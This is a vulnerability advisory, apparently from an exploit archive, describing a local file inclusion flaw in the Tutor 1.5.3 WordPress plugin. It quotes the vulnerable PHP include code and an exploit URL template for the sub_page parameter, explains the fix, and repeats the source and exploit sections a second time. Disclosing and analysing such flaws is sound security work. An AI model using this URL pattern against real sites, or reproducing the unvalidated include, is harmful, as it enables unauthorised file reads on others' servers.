# Title: Wordpress Plugin tutor.1.5.3 - Local File Inclusion
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-12
# vendor home page: https://wordpress.org/plugins/tutor/
===================================================================
Vulnerable page:
/instructors.php
===================================================================
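Vulnerable Source:
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET);
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php";
7: include $include_file;
requires:
4: if(!empty($sub_page))
6: if(file_exists($include_file))
Note: sub_page is read from the query string (line 3) and placed into the include path (line 5) without validation. The only checks before the include are the non-empty test (line 4) and file_exists() (line 6), so the value is not confined to views/pages/. The appended ".php" suffix limits the include to files with that extension. The fix is to compare sub_page against a fixed list of known page names before building the path.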
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
=================================================================================
contact me:
telegram: @MF0584
gmail: mehranfeizi13841384@gmail.com
===================================================================
Vulnerable page:
/instructors.php
===================================================================
Vulnerable Source:
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET);
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php";
7: include $include_file;
requires:
4: if(!empty($sub_page))
6: if(file_exists($include_file))
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
=================================================================================